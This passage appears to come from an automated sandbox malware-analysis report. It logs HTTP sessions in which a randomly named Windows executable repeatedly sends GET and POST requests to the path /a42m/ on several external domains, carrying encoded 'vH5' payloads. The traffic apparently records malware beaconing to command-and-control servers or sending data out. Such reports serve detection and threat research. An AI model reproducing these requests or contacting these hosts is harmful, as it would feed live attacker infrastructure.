                          4 | 192.168.2.5 | 53657 | 162.240.81.18 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:18.761145115 CEST | 487 | OUT | GET /a42m/?R0nl4=f64p&vH5=BaBbynwG2FaMiw+m+oe/pVgQl9HtQpBnPsDfKOVNrs70A5vduIAG3AN1jPdCIStIA9EjWNWwwUOGmupZW6v0AZj8SPVeonrFiOinbxCwnOWiWMOKy28ccO1L5nk/mSSCeg== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.tintasmaiscor.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:17:19.336457968 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.20.1
                          Date: Thu, 23 May 2024 13:17:19 GMT
                          Content-Type: text/html
                          Content-Length: 3650
                          Connection: close
                          ETag: "636d2d22-e42"
                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                          May 23, 2024 15:17:19.337523937 CEST | 1236 | IN
                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                          May 23, 2024 15:17:19.341311932 CEST | 1236 | IN
                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                          May 23, 2024 15:17:19.341347933 CEST | 115 | IN
                          Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          5 | 192.168.2.5 | 53658 | 162.0.237.22 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:24.415113926 CEST | 762 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.crimsoncascade.xyz
                          Origin: http://www.crimsoncascade.xyz
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.crimsoncascade.xyz/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=DYqRhV+0yPO3QmIG+8lZqZCa9KEEZjHw7b8ekir+9SxVvpHPKPuXSjEJbzufzzRdxHoxZHuo7EmPbBzoxUEYv5gZpNiEbnMa6vgD9eogO1SSa9nXuR3YjaP5TQ5wEgwLBPST4Kpd3eAGDoWA94mT+rvOBb0A1IA0+/GpWrDHwUrv0AFEdrCTLC70xIuu4ZuHfMJqD1c=
                          May 23, 2024 15:17:25.002605915 CEST | 533 | IN | HTTP/1.1 404 Not Found
                          Date: Thu, 23 May 2024 13:17:24 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          6 | 192.168.2.5 | 53659 | 162.0.237.22 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:26.949980974 CEST | 782 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.crimsoncascade.xyz
                          Origin: http://www.crimsoncascade.xyz
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.crimsoncascade.xyz/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=DYqRhV+0yPO3RFgG4v9Zr5CbhaEEMTH07bweknLU8khVuMrPLLCXRjEJUTuQtDRCxGVEZGSo7EyPbADoxjYbupgfktiGVHMa6vgD9aAOO1KSbO/Xtw3b9qP6UQ5wVQwHBPS94PJn3YMGDpmA9pmSl7vMFb0TkbY70vvnUKeag1T68WouHJK7YiXMhbmZppPuFvZadiLW8Al1MGIEGftkO4z2BuuZ
                          May 23, 2024 15:17:27.610160112 CEST | 533 | IN | HTTP/1.1 404 Not Found
                          Date: Thu, 23 May 2024 13:17:27 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          7 | 192.168.2.5 | 53660 | 162.0.237.22 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:29.484458923 CEST | 1799 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.crimsoncascade.xyz
                          Origin: http://www.crimsoncascade.xyz
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.crimsoncascade.xyz/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5= [TRUNCATED]
                          May 23, 2024 15:17:30.074572086 CEST | 533 | IN | HTTP/1.1 404 Not Found
                          Date: Thu, 23 May 2024 13:17:29 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          8 | 192.168.2.5 | 53661 | 162.0.237.22 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:32.170289993 CEST | 488 | OUT | GET /a42m/?vH5=OaCxij+az8CWZkVSgZ9BvYP+nrAHPzHJsZdPmSHU0RFVoK/pLfrBJ2MjeSz+pAxrgiF9enqzkwmMWhrDz0ZQ4sIJ7tOHf1xt78d5/aV4E0eta/TI3w61kMO4VihKAD9uew==&R0nl4=f64p HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.crimsoncascade.xyz
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:17:32.796171904 CEST | 548 | IN | HTTP/1.1 404 Not Found
                          Date: Thu, 23 May 2024 13:17:32 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          9 | 192.168.2.5 | 53662 | 84.32.84.32 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:38.848829985 CEST | 777 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.xn--bb55rtp-9va2p.store
                          Origin: http://www.xn--bb55rtp-9va2p.store
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.xn--bb55rtp-9va2p.store/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=fr5GzVnOE1bYCR/H7keUbvmbt0pfCaq2hgkwhUskwJfpVQ97+OLyt8Sc+UkJPG/QE87eqngy8x2FvjlkW/HaU0XDKJCmo54vZwkfBDNI1Wljx30W7Cf5M6cublyk9Qdq38ixJVBVExAKNi4KFUTcNurzuZ0JmdPPmX/abPh9FZohpNI4LZCJtjWdnk78xh4Ij/CHzJQ=


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          10 | 192.168.2.5 | 53663 | 84.32.84.32 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:41.385505915 CEST | 797 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.xn--bb55rtp-9va2p.store
                          Origin: http://www.xn--bb55rtp-9va2p.store
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.xn--bb55rtp-9va2p.store/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=fr5GzVnOE1bYC03H3jKUdPmUo0pfL6r9hg4whQ8037LpVxh75L3ys8Sc10lDLG/hE8Gjqigy8wSFvhtkRM/FXEXBGpCks54vZwkfBHlm1WtjwHkW6jf6Sqctalyk3wdu38jeJXk+EzoKNjIKEFTfX+r5g50fgo6VrWDkWeE0QuMYhblSR7Kh+D6l33zLgRZh5cS3teFi8f0X2qNxF83drr2VBOEW


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          11 | 192.168.2.5 | 53664 | 84.32.84.32 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:43.918405056 CEST | 1814 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.xn--bb55rtp-9va2p.store
                          Origin: http://www.xn--bb55rtp-9va2p.store
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.xn--bb55rtp-9va2p.store/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=fr5GzVnOE1bYC03H3jKUdPmUo0pfL6r9hg4whQ8037TpVjp7/ofy+sSc4UlALG/GE4rkqici8z6FuC1kQ9/FAUXBb5Clo551Z0ITBDBm1WtjwFsW6yf6Vacublyw9QdW3/TkJXxFECIKNDYKD37fPur3tZ1cgo/LrWeXWegeQo8Yw6ASU/KEvQ2hxHXF53FE68Svlvl2hdEvxdF8QYPUyay+QaVYp3Ky75ZxwIuoKgiqDXxljL6QAAAzPfwGidw/V2Tu068i+zptOj1nMbOD/6r0QbSrWg3yo6uz+vjJvOTZYM4D4tq7ajamsRBlgaVu28dqnCXdWOnzbVzUUhZl1ALti0iEIOo/U3+axGYxOb44N26Du7KpwQoY1UepzMBpsPk03urrC1PJEOiMEN5t4bhkPOaeL5G0yyi6eyc3E+GA8t4yQbph8tTNII/LqF7MEMbovUg2mWTYpamPb8bEF/auCzsjrF0N+xjnE10F9n3rqK3pc1AMug/UvaZLeXVFP+RWhMD7+ZEmwnCdgpLYjKpNhDpP5HAHWGjvhkP+iUIT8nCEfOCZRb6oioraHIONmE2xdQ1vIx8RtqY5b8nyIx1dOwHTj0WyVxgRMt7xW9ALbypr+kPVFlliNv22u5kTs06Jh7I4i9a0LafDpph34rYkD32W+O51L8IeE3J9kVfuh+FP7D2L5AseEm/EkNEt/dwir+3bkS+N3KiuFsewvjcw6BrgMGzUY7U3KOuy2CyrD3BKkH+HveWqaHYcpkCEf4/u/aBUWlLTiLuWz1nx4IrKZ5Io59k+X4M2xZmyDB57rfKZb9r8WXmH1+7kIFAD4+EFwJF1q3lVqDKIMSYqM1pLd/MWdZhD+05k5ZqsNiK4xcYzJGb0VKPEdTr2gkL0kOWAafekhhzC67Z2U2tn64sVGS5deqY/T048oounP0qa2nuvjpcUVkKqvvqnGOTjCWw7nlCXnn/UreO2zi/ay79ucQCDd9IyzMYZSEisNx9y8V7P [TRUNCATED]


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          12 | 192.168.2.5 | 53665 | 84.32.84.32 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:46.447711945 CEST | 493 | OUT | GET /a42m/?R0nl4=f64p&vH5=SpRmwiWWWie0LiCX9EyQXvy6lxMcCKfTuTRukl4i+K/mOSJ9++mgtoeJyEwnF13dco3p6AsQh3ikhhdZe62TUGOhYKvcqIkBTBlrJzQRtlxjx1oX6jajL6xfb2K92Bka0g== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.xn--bb55rtp-9va2p.store
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:17:46.911876917 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Server: hcdn
                          Date: Thu, 23 May 2024 13:17:46 GMT
                          Content-Type: text/html
                          Content-Length: 10072
                          Connection: close
                          Vary: Accept-Encoding
                          alt-svc: h3=":443"; ma=86400
                          x-hcdn-request-id: 61ec0868920235e7131f57d2e2b58bf9-bos-edge3
                          Expires: Thu, 23 May 2024 13:17:45 GMT
                          Cache-Control: no-cache
                          Accept-Ranges: bytes
                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                          May 23, 2024 15:17:46.913451910 CEST | 1236 | IN
                          Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                          May 23, 2024 15:17:46.917015076 CEST | 1236 | IN
                          Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                          May 23, 2024 15:17:46.920737982 CEST | 1236 | IN
                          Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                          May 23, 2024 15:17:46.920758963 CEST | 1236 | IN
                          Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                          May 23, 2024 15:17:46.927788973 CEST | 1236 | IN
                          Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                          May 23, 2024 15:17:46.930634022 CEST | 1236 | IN
                          Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                          May 23, 2024 15:17:46.930655003 CEST | 1236 | IN
                          Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
                          May 23, 2024 15:17:46.930672884 CEST | 524 | IN
                          Data Ascii: w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          13 | 192.168.2.5 | 53666 | 63.250.43.147 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:52.007811069 CEST | 741 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.fidyart.com
                          Origin: http://www.fidyart.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.fidyart.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=eTyY4b+TjCck73l13o+CQ5u25bqJVgfkGsyY0yFBXUVz6rW9FfhkjJFi7yzsmW8ajl/XODsnLKa7CB+5hyiNrUTnh43JNzlVi7mZ5NdLxIb5fMc1XwaNlLipESu6Uqp6Dy4n6qzqt5dDArX9uvIznl9rJyGS6V3xvGMvdF9o6RFVqALoJ46c8XhLn3cPnBrmwKcPK68=
                          May 23, 2024 15:17:52.631057978 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          content-type: text/html
                          date: Thu, 23 May 2024 13:17:52 GMT
                          transfer-encoding: chunked
                          connection: close
                          Data Raw: 33 46 42 41 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 [TRUNCATED]
                          Data Ascii: 3FBA<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAAAXNSR0IArs4c6QAACHhJREFUeAHdW2lsHEUWrqqZsT3j2FmbHBxBXsyGsAsCCRIRgjicA2JHRAtEQtHCj2i1ihASgnCEOFnEj9jhNAgpIC7xA6RoEYeIiB0WEgdLiYSSrATi2JBsIBAMPmIndjzjeDxV+73xtNUz7unpqukZj+gfrup6r973va+rq2q625wV+Ljw0KuRod5Ti5RSSxRnixRjczhjNYCtUUxRyTjjgygGYRuErZcrdpBzfqB6znkHuxeuj5JPoQ7g+X9ce+jV0H/7BtZIJe9nTF3HFAsaoXA2Dnm+EFxsv3x27XuHF66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6uh6gdabAPvarS3ExCml0C [TRUNCATED]


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          14 | 192.168.2.5 | 53667 | 63.250.43.147 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:54.544348955 CEST | 761 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.fidyart.com
                          Origin: http://www.fidyart.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.fidyart.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 65 54 79 59 34 62 2b 54 6a 43 63 6b 37 57 56 31 78 2f 71 43 63 4a 75 33 31 37 71 4a 61 41 66 67 47 73 32 59 30 33 6b 4d 57 6e 78 7a 36 4c 6d 39 45 64 46 6b 77 35 46 69 77 53 7a 74 72 32 38 76 6a 6c 7a 68 4f 43 51 6e 4c 4b 2b 37 43 44 32 35 68 42 4b 4f 72 45 54 6c 70 59 33 4c 43 54 6c 56 69 37 6d 5a 35 4d 35 78 78 49 7a 35 66 39 73 31 56 52 61 4b 35 62 69 75 4e 79 75 36 46 36 70 2b 44 79 35 4b 36 75 36 33 74 36 6c 44 41 72 48 39 75 64 67 77 74 6c 39 70 48 53 48 68 79 58 79 67 33 56 4d 62 51 6c 78 71 75 69 46 51 76 32 6d 43 54 61 79 30 76 33 4e 7a 33 6b 55 34 32 78 4b 50 71 70 4d 2f 55 74 72 4d 70 38 57 50 4b 72 52 66 4c 44 6d 2f 52 4a 72 66 4f 36 32 37
                          Data Ascii: vH5=eTyY4b+TjCck7WV1x/qCcJu317qJaAfgGs2Y03kMWnxz6Lm9EdFkw5FiwSztr28vjlzhOCQnLK+7CD25hBKOrETlpY3LCTlVi7mZ5M5xxIz5f9s1VRaK5biuNyu6F6p+Dy5K6u63t6lDArH9udgwtl9pHSHhyXyg3VMbQlxquiFQv2mCTay0v3Nz3kU42xKPqpM/UtrMp8WPKrRfLDm/RJrfO627
                          May 23, 2024 15:17:55.128134966 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          content-type: text/html
                          date: Thu, 23 May 2024 13:17:55 GMT
                          transfer-encoding: chunked
                          connection: close
